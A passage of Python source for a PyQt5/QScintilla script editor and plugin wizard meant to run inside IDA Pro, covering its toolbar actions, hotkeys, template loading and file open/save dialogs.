" # Hotkeys # \n" \
" # NewFile: Ctrl+N #\n" \
" # OpenFile: Ctrl+O #\n" \
" # SaveFile: Ctrl+S #\n" \
" # RunScript: Ctrl+E #\n" \
" # Undo: Ctrl+Z #\n" \
" # Redo: Ctrl+Y #\n" \
" # SelectALL: Ctrl+A #\n" \
" # Paste: Ctrl+V #\n" \
" # Font: Ctrl+F #\n" \
" # ResetFolding: Ctrl+R #\n" \
" # CircleFolding: Ctrl+C #\n" \
" # PlainFolding: Ctrl+P #\n" \
" # HEX-ray Home: Ctrl+W #\n" \
" # Ida Pro Python SDK Ctrl+I #\n" \
" # IDAPROPythonGit: Ctrl+G #\n" \
" # Author: Ctrl+B #\n" \
" # Enable Reg: Alt+E #\n" \
" # Disable Reg: Alt+D #\n" \
" # Zoom in Ctrl+Shift+ + #\n" \
" # Zoom Out Ctrl+Shift+ - #\n" \
" # Profile Code Ctrl+Shift+ E #\n" \
" ###################################################\n" \
" # IDA PRO python Editor #\n" \
" ###################################################\n"
import os
import sys
try:
dn = idaapi.idadir("plugins\\Code editor")
except NameError:
dn = os.getcwd()
try:
TemplateFile = idaapi.idadir("plugins\\Code editor\\template\\Plugin_temp")
except NameError:
TemplateFile = os.getcwd()+r'\\template\\Plugin_temp'
sys.path.insert(0, dn)
sys.path.insert(0, os.getcwd()+r'\\icons')
sys.path.insert(0, os.getcwd()+r'\\template')
import PyQt5
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.Qsci import QsciScintilla, QsciLexerPython
from PyQt5.QtGui import QFont, QFontMetrics, QColor
from PyQt5.QtWidgets import QDialog, QMessageBox, QWizard, QWizardPage
from PyQt5.QtCore import QCoreApplication
plugin_path = ""
if sys.platform == "win32":
if hasattr(sys, "frozen"):
plugin_path = os.path.join(os.path.dirname(os.path.abspath(sys.executable)), "PyQt5", "plugins")
QCoreApplication.addLibraryPath(plugin_path)
else:
import site
for dir in site.getsitepackages():
QCoreApplication.addLibraryPath(os.path.join(dir, "PyQt5", "plugins"))
elif sys.platform == "darwin":
plugin_path = os.path.join(QCoreApplication.getInstallPrefix(), "Resources", "plugins")
if plugin_path:
QCoreApplication.addLibraryPath(plugin_path)
if hasattr(QtCore.Qt, 'AA_EnableHighDpiScaling'):
PyQt5.QtWidgets.QApplication.setAttribute(QtCore.Qt.AA_EnableHighDpiScaling, True)
if hasattr(QtCore.Qt, 'AA_UseHighDpiPixmaps'):
PyQt5.QtWidgets.QApplication.setAttribute(QtCore.Qt.AA_UseHighDpiPixmaps, True)
try:
import ico
except ImportError:
import icons.ico
try:
import iconsmore
except ImportError:
import icons.iconsmore
try:
import icons3
except ImportError:
import icons.icons3
try:
import iconf
except ImportError:
import icons.iconf
try:
import icon4
except ImportError:
pass
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtWidgets.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtWidgets.QApplication.translate(context, text,
disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtWidgets.QApplication.translate(context, text, disambig)
class Ui_messageformForm(QtWidgets.QWidget):
def setupUi1(self, messageformForm):
messageformForm.setObjectName("messageformForm")
messageformForm.resize(404, 169)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Ignored, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(messageformForm.sizePolicy().hasHeightForWidth())
messageformForm.setSizePolicy(sizePolicy)
font = QtGui.QFont()
font.setFamily("Consolas")
messageformForm.setFont(font)
icon2 = QtGui.QIcon()
icon2.addPixmap(QtGui.QPixmap(":/icons/twa.gif"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
messageformForm.setWindowIcon(icon2)
self.label = QtWidgets.QLabel(messageformForm)
self.label.setGeometry(QtCore.QRect(40, 20, 341, 111))
font = QtGui.QFont()
font.setPointSize(19)
self.label.setFont(font)
self.label.setObjectName("label")
self.retranslateUi(messageformForm)
QtCore.QMetaObject.connectSlotsByName(messageformForm)
def retranslateUi(self, messageformForm):
_translate = QtCore.QCoreApplication.translate
messageformForm.setWindowTitle(_translate("messageformForm", "Soon to be fixed"))
self.label.setText(_translate("messageformForm", "Soon to be fixed"
))
class Ui_Wizard(QtWidgets.QWizard):
def __init__(self, parent=None):
super(Ui_Wizard, self).__init__(parent=None)
Wizard.setObjectName("Wizard")
Wizard.resize(762, 500)
font = QtGui.QFont()
font.setFamily("Calibri Light")
Wizard.setFont(font)
Wizard.setOptions(QtWidgets.QWizard.HelpButtonOnRight)
self.wizardPage1 = QtWidgets.QWizardPage()
font = QtGui.QFont()
font.setFamily("Calibri Light")
font.setPointSize(20)
self.wizardPage1.setFont(font)
self.wizardPage1.setObjectName("wizardPage1")
self.textBrowser_2 = QtWidgets.QTextBrowser(self.wizardPage1)
self.textBrowser_2.setGeometry(QtCore.QRect(130, 140, 421, 131))
self.textBrowser_2.setFrameShape(QtWidgets.QFrame.NoFrame)
self.textBrowser_2.setObjectName("textBrowser_2")
Wizard.addPage(self.wizardPage1)
self.wizardPage = QtWidgets.QWizardPage()
self.wizardPage.setTitle("")
self.wizardPage.setSubTitle("")
self.wizardPage.setObjectName("wizardPage")
self.textBrowser_4 = QtWidgets.QTextBrowser(self.wizardPage)
self.textBrowser_4.setGeometry(QtCore.QRect(130, 140, 499, 239))
self.textBrowser_4.setFrameShape(QtWidgets.QFrame.NoFrame)
self.textBrowser_4.setObjectName("textBrowser_4")
Wizard.addPage(self.wizardPage)
self.tempwizardPage = QtWidgets.QWizardPage()
self.tempwizardPage.setObjectName("tempwizardPage")
self.verticalLayout = QtWidgets.QVBoxLayout(self.tempwizardPage)
self.verticalLayout.setObjectName("verticalLayout")
self.TemptextEdit = Qsci.QsciScintilla(self.tempwizardPage)
self.TemptextEdit.setToolTip("")
self.TemptextEdit.setWhatsThis("")
self.TemptextEdit.setObjectName("TemptextEdit")
self.verticalLayout.addWidget(self.TemptextEdit)
self.horizontalLayout = QtWidgets.QHBoxLayout()
self.horizontalLayout.setObjectName("horizontalLayout")
spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout.addItem(spacerItem)
self.temppushButtonopen = QtWidgets.QPushButton(self.tempwizardPage)
self.temppushButtonopen.setObjectName("temppushButtonopen")
self.horizontalLayout.addWidget(self.temppushButtonopen)
self.temppushButtonsave = QtWidgets.QPushButton(self.tempwizardPage)
self.temppushButtonsave.setObjectName("temppushButtonsave")
self.horizontalLayout.addWidget(self.temppushButtonsave)
self.verticalLayout.addLayout(self.horizontalLayout)
Wizard.addPage(self.tempwizardPage)
self.scriptwizardPage = QtWidgets.QWizardPage()
self.scriptwizardPage.setObjectName("scriptwizardPage")
self.textBrowser_5 = QtWidgets.QTextBrowser(self.scriptwizardPage)
self.textBrowser_5.setGeometry(QtCore.QRect(120, 130, 499, 239))
self.textBrowser_5.setFrameShape(QtWidgets.QFrame.NoFrame)
self.textBrowser_5.setObjectName("textBrowser_5")
Wizard.addPage(self.scriptwizardPage)
self.wizardPage_3 = QtWidgets.QWizardPage()
self.wizardPage_3.setObjectName("wizardPage_3")
self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.wizardPage_3)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.script_textEdit = Qsci.QsciScintilla(self.wizardPage_3)
self.script_textEdit.setToolTip("")
self.script_textEdit.setWhatsThis("")
self.script_textEdit.setObjectName("script_textEdit")
self.verticalLayout_2.addWidget(self.script_textEdit)
self.horizontalLayout_2 = QtWidgets.QHBoxLayout()
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
spacerItem1 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_2.addItem(spacerItem1)
self.scriptGrabpushButton = QtWidgets.QPushButton(self.wizardPage_3)
self.scriptGrabpushButton.setObjectName("scriptGrabpushButton")
self.horizontalLayout_2.addWidget(self.scriptGrabpushButton)
self.scriptpushButtonopen = QtWidgets.QPushButton(self.wizardPage_3)
self.scriptpushButtonopen.setObjectName("scriptpushButtonopen")
self.horizontalLayout_2.addWidget(self.scriptpushButtonopen)
self.scriptpushButtonsave = QtWidgets.QPushButton(self.wizardPage_3)
self.scriptpushButtonsave.setObjectName("scriptpushButtonsave")
self.horizontalLayout_2.addWidget(self.scriptpushButtonsave)
self.verticalLayout_2.addLayout(self.horizontalLayout_2)
Wizard.addPage(self.wizardPage_3)
self.wizardPage_2 = QtWidgets.QWizardPage()
font = QtGui.QFont()
font.setPointSize(20)
self.wizardPage_2.setFont(font)
self.wizardPage_2.setObjectName("wizardPage_2")
self.textBrowser_6 = QtWidgets.QTextBrowser(self.wizardPage_2)
self.textBrowser_6.setGeometry(QtCore.QRect(170, 140, 411, 191))
self.textBrowser_6.setFrameShape(QtWidgets.QFrame.NoFrame)
self.textBrowser_6.setObjectName("textBrowser_6")
Wizard.addPage(self.wizardPage_2)
#font textedit
self.skrift = QFont()
self.skrift.setFamily('Consolas')
self.skrift.setFixedPitch(True)
self.skrift.setPointSize(11)
self.TemptextEdit.setFont(self.skrift)
self.script_textEdit.setFont(self.skrift)
#python style temp
self.lexer = QsciLexerPython(self.TemptextEdit)
self.lexer.setFont(self.skrift)
self.lexer.setEolFill(True)
#Python style scritps
self.lexer = QsciLexerPython(self.script_textEdit)
self.lexer.setFont(self.skrift)
self.lexer.setEolFill(True)
self.filename = ""
#python style temp
self.TemptextEdit.setAutoCompletionThreshold(0)
self.TemptextEdit.setAutoCompletionThreshold(6)
self.TemptextEdit.setAutoCompletionThreshold(8)
self.TemptextEdit.setAutoCompletionSource(Qsci.QsciScintilla.AcsAPIs)
# self.TemptextEdit.setDefaultFont(self.skrift)
self.TemptextEdit.setLexer(self.lexer)
self.TemptextEdit.SendScintilla(QsciScintilla.SCI_STYLESETFONT, 1, 'Consolas')
#python style script
self.script_textEdit.setAutoCompletionThreshold(0)
self.script_textEdit.setAutoCompletionThreshold(6)
self.script_textEdit.setAutoCompletionThreshold(8)
self.script_textEdit.setAutoCompletionSource(Qsci.QsciScintilla.AcsAPIs)
# self.script_textEdit.setDefaultFont(self.skrift)
self.script_textEdit.setLexer(self.lexer)
self.script_textEdit.SendScintilla(QsciScintilla.SCI_STYLESETFONT, 1, 'Consolas')
#line numbers temp
fontmetrics = QFontMetrics(self.skrift)
self.TemptextEdit.setMarginsFont(self.skrift)
self.TemptextEdit.setMarginWidth(0, fontmetrics.width("00000") + 6)
self.TemptextEdit.setTabWidth(4)
#line numbers script
fontmetrics = QFontMetrics(self.skrift)
self.script_textEdit.setMarginsFont(self.skrift)
self.script_textEdit.setMarginWidth(0, fontmetrics.width("00000") + 6)
self.script_textEdit.setTabWidth(4)
#brace temp
self.TemptextEdit.setBraceMatching(QsciScintilla.SloppyBraceMatch)
#brace script
self.script_textEdit.setBraceMatching(QsciScintilla.SloppyBraceMatch)
#auto line tab =4 temp
self.TemptextEdit.setAutoIndent(True)
#auto line tab =4 script
self.TemptextEdit.setAutoIndent(True)
#scroolbar
self.script_textEdit.SendScintilla(QsciScintilla.SCI_SETHSCROLLBAR, 1)
try:
bs = open(TemplateFile).read()
bba = QtCore.QByteArray(bs)
self.bts = QtCore.QTextStream(bba)
self.bheysa = self.bts.readAll()
self.TemptextEdit.setText(self.bheysa)
self.TemptextEdit.setMarkerBackgroundColor((QColor(66, 66, 255)))
marker = self.TemptextEdit.markerDefine(PyQt5.Qsci.QsciScintilla.Rectangle, 2)
self.TemptextEdit.markerAdd(7, 2)
self.TemptextEdit.markerAdd(11, 2)
self.TemptextEdit.markerAdd(12, 2)
self.TemptextEdit.markerAdd(13, 2)
self.TemptextEdit.markerAdd(14, 2)
self.TemptextEdit.markerAdd(15, 2)
self.TemptextEdit.markerAdd(19, 2)
self.TemptextEdit.markerAdd(27, 2)
self.TemptextEdit.markerAdd(34, 2)
self.TemptextEdit.markerAdd(35, 2)
self.TemptextEdit.markerAdd(40, 2)
self.TemptextEdit.markerAdd(41, 2)
self.TemptextEdit.markerAdd(42, 2)
self.TemptextEdit.markerAdd(43, 2)
self.TemptextEdit.markerAdd(44, 2)
self.TemptextEdit.markerAdd(45, 2)
self.TemptextEdit.markerAdd(48, 2)
self.TemptextEdit.markerAdd(50, 2)
self.TemptextEdit.markerAdd(51, 2)
self.TemptextEdit.markerAdd(52, 2)
self.TemptextEdit.markerAdd(53, 2)
self.TemptextEdit.markerAdd(54, 2)
self.TemptextEdit.markerAdd(55, 2)
self.TemptextEdit.markerAdd(62, 2)
self.TemptextEdit.markerAdd(63, 2)
self.TemptextEdit.markerAdd(64, 2)
self.TemptextEdit.markerAdd(67, 2)
self.TemptextEdit.markerAdd(89, 2)
self.TemptextEdit.markerAdd(97, 2)
self.TemptextEdit.markerAdd(98, 2)
self.TemptextEdit.markerAdd(99, 2)
self.TemptextEdit.markerAdd(102, 2)
except:
self.TemptextEdit.setText('Plugin_temp file not found')
pass
self.retranslateUi2(Wizard)
QtCore.QMetaObject.connectSlotsByName(Wizard)
def retranslateUi2(self, Wizard):
_translate = QtCore.QCoreApplication.translate
Wizard.setWindowTitle(_translate("Wizard", " Ida Pro Plugin Wizard"))
self.textBrowser_2.setHtml(_translate("Wizard", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'Calibri Light\'; font-size:20pt; font-weight:400; font-style:normal;\">\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">Welcome to the plugin wizard.</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">Please follow the steps in the wizard, to tranform your code, to a full Ida Pro plugin.</p></body></html>"))
self.textBrowser_4.setHtml(_translate("Wizard", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'Calibri Light\'; font-size:8.14286pt; font-weight:400; font-style:normal;\">\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-size:20pt;\">First we create the plugin loader</span></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-size:20pt;\">Then we change the higlightet text in the template, and then save the plugin loader in Ida Pro Plugins folder.</span></p></body></html>"))
self.temppushButtonopen.setText(_translate("Wizard", "Open"))
self.temppushButtonsave.setText(_translate("Wizard", "Save"))
self.textBrowser_5.setHtml(_translate("Wizard", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'Calibri Light\'; font-size:8.14286pt; font-weight:400; font-style:normal;\">\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-size:20pt;\">Now we grab the editors current script, or open a new script.<br />Remember to save this in the right folder.<br />Plugins\\My_plugin_folder as declared in the template.</span></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-size:20pt;\"><br /></p></body></html>"))
self.scriptGrabpushButton.setText(_translate("Wizard", "Grab from Editor"))
self.scriptpushButtonopen.setText(_translate("Wizard", "Open"))
self.scriptpushButtonsave.setText(_translate("Wizard", "Save"))
self.textBrowser_6.setHtml(_translate("Wizard", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'Calibri Light\'; font-size:20pt; font-weight:400; font-style:normal;\">\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">Loader Template should now be in <br />ida pro\\plugin<br />script should be in a subfolder<br />ida pro\\plugin\\Myplugin\\</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">If above are correct your good to go!</p></body></html>"))
self.temppushButtonopen.clicked.connect(self.opentemp)
self.temppushButtonsave.clicked.connect(self.savetemp)
self.scriptpushButtonopen.clicked.connect(self.openscript)
self.scriptpushButtonsave.clicked.connect(self.savescript)
self.scriptGrabpushButton.clicked.connect(self.grapper)
def grapper(self):
#hellotext = Ui_MainWindow
# hello2= hellotext.sendgrapped
# print str(hello2)
messageformForm.show()
def opentemp(self):
print "hello"
self.path = QtCore.QFileInfo(self.filename).path()
# Get filename and show only .writer files
(self.filename, _) = \
QtWidgets.QFileDialog.getOpenFileName(self.wizardPage_3,
'Open File', self.path,
'Python Files (*.py *.pyc *.pyw)', '')
if self.filename:
with open(self.filename, 'r') as self.file:
self.TemptextEdit.setText(self.file.read())
os.chdir(str(self.path))
def savetemp(self):
self.path = QtCore.QFileInfo(self.filename).path()
(self.filename, _) = \
QtWidgets.QFileDialog.getSaveFileName(self, 'Save as'
, self.path, 'Python Files (*.py *.pyc *.pyw)')
if self.filename:
self.savetexttemp(self.filename)
os.chdir(str(self.path))
def savetexttemp(self, fileName):
textout = self.TemptextEdit.text()
file = QtCore.QFile(fileName)
if file.open(QtCore.QIODevice.WriteOnly):
QtCore.QTextStream(file) << textout
else:
QtWidgets.QMessageBox.information(self.tempwizardPage,
'Unable to open file', file.errorString())
os.chdir(str(self.path))
def openscript(self):
print "hello"
self.path = QtCore.QFileInfo(self.filename).path()
# Get filename and show only .writer files
(self.filename, _) = \
QtWidgets.QFileDialog.getOpenFileName(self.wizardPage_3,
'Open File', self.path,
'Python Files (*.py *.pyc *.pyw)', '')
if self.filename:
with open(self.filename, 'r') as self.file:
self.script_textEdit.setText(self.file.read())
os.chdir(str(self.path))
def savescript(self):
self.path = QtCore.QFileInfo(self.filename).path()
(self.filename, _) = \
QtWidgets.QFileDialog.getSaveFileName(self.wizardPage_3, 'Save as'
, self.path, 'Python Files (*.py *.pyc *.pyw)')
if self.filename:
self.savetextscript(self.filename)
os.chdir(str(self.path))
def savetextscript(self, fileName):
textout = self.script_textEdit.text()
file = QtCore.QFile(fileName)
if file.open(QtCore.QIODevice.WriteOnly):
QtCore.QTextStream(file) << textout
else:
QtWidgets.QMessageBox.information(self.wizardPage_3,
'Unable to open file', file.errorString())
os.chdir(str(self.path))
from PyQt5 import Qsci
import sys
#app2 = QtWidgets.QApplication(sys.argv)
class Ui_MainWindow(QtWidgets.QMainWindow):
ARROW_MARKER_NUM = 8
def __init__(self, parent=None):
super(Ui_MainWindow, self).__init__(parent=None)
MainWindow.setObjectName(_fromUtf8("MainWindow"))
MainWindow.resize(640, 480)
self.vindu = QtWidgets.QWidget(MainWindow)
self.vindu.setStyleSheet(_fromUtf8('notusedasyet'))
#MainWindow.setWindowFlags(QtCore.Qt.WindowStaysOnTopHint)
self.vindu.setObjectName(_fromUtf8("vindu"))
self.verticalLayout = PyQt5.QtWidgets.QVBoxLayout(self.vindu)
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap(_fromUtf8(":/ico/python.png")), QtGui.QIcon.Normal, QtGui.QIcon.On)
MainWindow.setWindowIcon(icon)
self.verticalLayout.setContentsMargins(0,0,0,0)
self.verticalLayout.setSpacing(0)
self.verticalLayout.setObjectName(_fromUtf8('verticalLayout'))
self.codebox = Qsci.QsciScintilla(self.vindu)
self.codebox.setToolTip(_fromUtf8(""))
self.codebox.setWhatsThis(_fromUtf8(""))
self.codebox.setAutoFillBackground(False)
self.codebox.setFrameShape(QtWidgets.QFrame.NoFrame)
self.codebox.setObjectName(_fromUtf8("codebox"))
self.verticalLayout.addWidget(self.codebox)
MainWindow.setCentralWidget(self.vindu)
#toolbar
self.toolBar = QtWidgets.QToolBar(MainWindow)
self.toolBar.setAutoFillBackground(False)
self.toolBar.setIconSize(QtCore.QSize(32, 32))
self.toolBar.setToolButtonStyle(QtCore.Qt.ToolButtonIconOnly)
self.toolBar.setObjectName(_fromUtf8("toolBar2"))
MainWindow.addToolBar(QtCore.Qt.LeftToolBarArea, self.toolBar)
self.toolBar.addSeparator()
#toolbar2 debugger
#self.toolBar2 = QtGui.QToolBar(MainWindow)
#self.toolBar2.setAutoFillBackground(False)
#self.toolBar2.setIconSize(QtCore.QSize(32, 32))
#self.toolBar2.setToolButtonStyle(QtCore.Qt.ToolButtonIconOnly)
#self.toolBar2.setObjectName(_fromUtf8("toolBar"))
# MainWindow.addToolBar(QtCore.Qt.RightToolBarArea, self.toolBar2)
# self.toolBar2.addSeparator()
#getting ready for debugger
self.codebox.setMarginSensitivity(1, True)
self.codebox.marginClicked.connect(self.on_margin_clicked)
self.codebox.markerDefine(QsciScintilla.FullRectangle, self.ARROW_MARKER_NUM)
self.codebox.setMarkerBackgroundColor(QColor("#ee1111"), self.ARROW_MARKER_NUM)
#first action Newfile
self.toolBar.newAction = QtWidgets.QAction(QtGui.QIcon(":/ico/new.png"),"New",self.toolBar)
self.toolBar.newAction.setStatusTip("Clear TextBox or make new document.")
self.toolBar.newAction.setShortcut("Ctrl+N")
self.toolBar.newAction.triggered.connect(self.newfile)
#second Action OpenFile
self.toolBar.secondAction = QtWidgets.QAction(QtGui.QIcon(":/ico/open.png"),"Open",self.toolBar)
self.toolBar.secondAction.setStatusTip("Create a new document from scratch.")
self.toolBar.secondAction.setShortcut("Ctrl+O")
self.toolBar.secondAction.triggered.connect(self.open)
# action 3 save file
self.toolBar.Action3 = QtWidgets.QAction(QtGui.QIcon(":/ico/save.png"),"Save",self.toolBar)
self.toolBar.Action3.setStatusTip("Save Your File.")
self.toolBar.Action3.setShortcut("Ctrl+S")
self.toolBar.Action3.triggered.connect(self.savefile)
#action 4 run file
self.toolBar.Action4 = QtWidgets.QAction(QtGui.QIcon(":/ico/run32.png"),"Run",self.toolBar)
self.toolBar.Action4.setStatusTip("Run")
self.toolBar.Action4.setShortcut("Ctrl+E")
self.toolBar.Action4.triggered.connect(self.runto)
#action 21 debug
#self.toolBar2.Action21 = QtGui.QAction(QtGui.QIcon(":/ico/run32.png"),"Debug",self.toolBar)
#self.toolBar2.Action21.setStatusTip("Debug File.")
#self.toolBar2.Action21.setShortcut("Ctrl+7")
#self.toolBar2.Action21.triggered.connect(self.debugto)
#action 6 undo
self.toolBar.Action6 = QtWidgets.QAction(QtGui.QIcon(":/ico/undo.png"),"Redo",self.toolBar)
self.toolBar.Action6.setStatusTip("Undo.")
self.toolBar.Action6.setShortcut("Ctrl+Z")
self.toolBar.Action6.triggered.connect(self.codebox.undo)
#action 7 redo
self.toolBar.Action7 = QtWidgets.QAction(QtGui.QIcon(":/ico/redo.png"),"Redo",self.toolBar)
self.toolBar.Action7.setStatusTip("Redo.")
self.toolBar.Action7.setShortcut("Ctrl+Y")
self.toolBar.Action7.triggered.connect(self.codebox.redo)
#action8 rerset Folding
self.toolBar.Action8 = QtWidgets.QAction(QtGui.QIcon(":/ico/align-justify.png"),"Reset Folding",self.toolBar)
self.toolBar.Action8.setStatusTip("Reset Folding.")
self.toolBar.Action8.setShortcut("Ctrl+R")
self.toolBar.Action8.triggered.connect(self.nofoldingl)
#actions9 CircledTreeFoldStyle
self.toolBar.Action9 = QtWidgets.QAction(QtGui.QIcon(":/ico/bullet.png"),"Circled Tree Folding",self.toolBar)
self.toolBar.Action9.setStatusTip("Circled Tree Folding.")
self.toolBar.Action9.setShortcut("Ctrl+C")
self.toolBar.Action9.triggered.connect(self.Circledfold)
#actions10 plainFoldStyle
self.toolBar.Action10 = QtWidgets.QAction(QtGui.QIcon(":/ico/number.png"),"Plain Folding",self.toolBar)
self.toolBar.Action10.setStatusTip("Plain Folding")
self.toolBar.Action10.setShortcut("Ctrl+P")
self.toolBar.Action10.triggered.connect(self.plainfold)
# fonts
self.toolBar.Action21 = QtWidgets.QAction(QtGui.QIcon(":/ico4/font.png"), "Fonts", self.toolBar)
self.toolBar.Action21.setStatusTip("Fonts")
self.toolBar.Action21.setShortcut("Ctrl+F")
self.toolBar.Action21.triggered.connect(self.font_choice)
#web baby
self.toolBar.Action11 = QtWidgets.QAction(QtGui.QIcon(":/ico/web.png"),"Hex-rays Homepage",self.toolBar)
self.toolBar.Action11.setStatusTip("Home of Hex-rays")
self.toolBar.Action11.setShortcut("Ctrl+W")
self.toolBar.Action11.triggered.connect(self.webopen)
#irc
self.toolBar.Action12 = QtWidgets.QAction(QtGui.QIcon(":/ico3/settings.png"),"Open Ida Pro Python SDK",self.toolBar)
self.toolBar.Action12.setStatusTip("Ida Pro Python SDK")
self.toolBar.Action12.setShortcut("Ctrl+I")
self.toolBar.Action12.triggered.connect(self.sdkopen)
#github Python
self.toolBar.Action14 = QtWidgets.QAction(QtGui.QIcon(":/ico/github.png"),"Open git python",self.toolBar)
self.toolBar.Action14.setStatusTip("Open git python")
self.toolBar.Action14.setShortcut("Ctrl+G")
self.toolBar.Action14.triggered.connect(self.gitopen)
#auther me :)
self.toolBar.Action15 = QtWidgets.QAction(QtGui.QIcon(":/ico/auth.png"),"Author",self.toolBar)
self.toolBar.Action15.setStatusTip("Author")
self.toolBar.Action15.setShortcut("Ctrl+B")
self.toolBar.Action15.triggered.connect(self.Author)
#toggle off code regonision
self.toolBar.Action16 = QtWidgets.QAction(QtGui.QIcon(":/ico2/pythonminus.png"),"Disable Code recognition",self.toolBar)
self.toolBar.Action16.setStatusTip("Disable Code recognition")
self.toolBar.Action16.setShortcut("Alt+D")
self.toolBar.Action16.triggered.connect(self.Diablecode)
#toogle on
self.toolBar.Action17 = QtWidgets.QAction(QtGui.QIcon(":/ico2/pypluss.png"),"Enable Code recognition",self.toolBar)
self.toolBar.Action17.setStatusTip("Enable Code recognition")
self.toolBar.Action17.setShortcut("Alt+E")
self.toolBar.Action17.triggered.connect(self.Reiablecode)
# zoom in
self.toolBar.Action18 = QtWidgets.QAction(QtGui.QIcon(":/ico3/in.png"),"Zoom In",self.toolBar)
self.toolBar.Action18.setStatusTip("Zoom In")
self.toolBar.Action18.setShortcut("CTRL+SHIFT++")
self.toolBar.Action18.triggered.connect(self.udder)
#zoom out
self.toolBar.Action19 = QtWidgets.QAction(QtGui.QIcon(":/ico3/out.png"),"Zoom Out",self.toolBar)
self.toolBar.Action19.setStatusTip("Zoom Out")
self.toolBar.Action19.setShortcut("CTRL+SHIFT+-")
self.toolBar.Action19.triggered.connect(self.odder)
self.toolBar.Action20 = QtWidgets.QAction(QtGui.QIcon(":/ico3/10.png"),"Profile Code",self.toolBar)
self.toolBar.Action20.setStatusTip("Profile Code")
self.toolBar.Action20.setShortcut("CTRL+SHIFT+E")
self.toolBar.Action20.triggered.connect(self.runtoprob)
#PLUGINS HERE WE GO
self.toolBar.Action22 = QtWidgets.QAction(QtGui.QIcon(":/ico5/plugin.png"),"Plugin",self.toolBar)
self.toolBar.Action22.setStatusTip("Make plugin")
self.toolBar.Action22.setShortcut("")
self.toolBar.Action22.triggered.connect(self.plugin_make)
self.scriptfile = self.codebox.text()
self.filename = ""
#actions
self.toolBar.addAction(self.toolBar.newAction)
self.toolBar.addSeparator()
self.toolBar.addAction(self.toolBar.secondAction)
self.toolBar.addSeparator()
self.toolBar.addAction(self.toolBar.Action3)
self.toolBar.addSeparator()
self.toolBar.addAction(self.toolBar.Action4)
self.toolBar.addSeparator()
self.toolBar.addAction(self.toolBar.Action6)
self.toolBar.addSeparator()
self.toolBar.addAction(self.toolBar.Action7)
self.toolBar.addSeparator()
self.toolBar.addAction(self.toolBar.Action8)
self.toolBar.addSeparator()
self.toolBar.addAction(self.toolBar.Action9)
self.toolBar.addSeparator()
self.toolBar.addAction(self.toolBar.Action10)
self.toolBar.addSeparator()
self.toolBar.addAction(self.toolBar.Action21)
self.toolBar.addSeparator()
self.toolBar.addAction(self.toolBar.Action11)
self.toolBar.addSeparator()
self.toolBar.addAction(self.toolBar.Action12)
self.toolBar.addSeparator()
self.toolBar.addAction(self.toolBar.Action14)
self.toolBar.addSeparator()
self.toolBar.addAction(self.toolBar.Action15)
self.toolBar.addSeparator()
self.toolBar.addAction(self.toolBar.Action16)
self.toolBar.addSeparator()
self.toolBar.addAction(self.toolBar.Action17)
self.toolBar.addSeparator()
self.toolBar.addAction(self.toolBar.Action18)
self.toolBar.addSeparator()
self.toolBar.addAction(self.toolBar.Action19)
self.toolBar.addSeparator()
self.toolBar.addAction(self.toolBar.Action20)
self.toolBar.addSeparator()
self.toolBar.addAction(self.toolBar.Action21)
self.toolBar.addSeparator()
self.toolBar.addAction(self.toolBar.Action22)
self.skrift = QFont()
self.skrift.setFamily('Consolas')
self.skrift.setFixedPitch(True)
self.skrift.setPointSize(12)
self.codebox.setFont(self.skrift)
#python style
self.lexer = QsciLexerPython(self.codebox)
